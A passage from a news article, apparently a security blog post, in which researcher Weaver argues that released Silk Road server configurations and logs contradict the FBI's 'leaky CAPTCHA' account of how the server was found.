“The IP address listed in that file — 62.75.246.20 — was the front-end server for the Silk Road,” Weaver said. “Apparently, Ulbricht had this split architecture, where the initial communication through Tor went to the front-end server, which in turn just did a normal fetch to the back-end server. It’s not clear why he set it up this way, but the document the government released in 70-6.pdf shows the rules for serving the Silk Road Web pages, and those rules are that all content – including the login CAPTCHA – gets served to the front end server but to nobody else. This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server.”

Translation: Those rules mean that the Silk Road server would deny any request from the Internet that wasn’t coming from the front-end server, and that includes the CAPTCHA.

“This configuration file was last modified on June 6, so on June 11 — when the FBI said they [saw this leaky CAPTCHA] activity — the FBI could not have seen the CAPTCHA by connecting to the server while not using Tor,” Weaver said. “You simply would not have been able to get the CAPTCHA that way, because the server would refuse all requests.”

The FBI claims that it found the Silk Road server by examining plain text Internet traffic to and from the Silk Road CAPTCHA, and that it visited the address using a regular browser and received the CAPTCHA page. But Weaver says the traffic logs from the Silk Road server (PDF) that also were released by the government this week tell a different story.

“The server logs which the FBI provides as evidence show that, no, what happened is the FBI didn’t see a leakage coming from that IP,” he said. “What happened is they contacted that IP directly and got a PHPMyAdmin configuration page.” See this PDF file for a look at that PHPMyAdmin page. Here is the PHPMyAdmin server configuration.

But this is hardly a satisfying answer to how the FBI investigators located the Silk Road servers. After all, if the FBI investigators contacted the PHPMyAdmin page directly, how did they know to do that in the first place?

“That’s still the $64,000 question,” Weaver said. “So both the CAPTCHA couldn’t leak in that configuration, and the IP the government visited wasn’t providing the CAPTCHA, but instead a PHPMyAdmin interface. Thus, the leaky CAPTCHA story is full of holes.”

Many in the Internet community have officially called baloney [that’s a technical term] on the government’s claims, and these latest apparently contradictory revelations from the government are likely to fuel speculation that the government is trying to explain away some not-so-by-the-book investigative methods.

“I find it surprising that when given the chance to provide a cogent, on-the record explanation for how they discovered the server, they instead produced a statement that has been shown inconsistent with reality, and that they knew would be inconsistent with reality,” Weaver said. “Let me tell you, those tin foil hats are looking more and more fashionable each day.”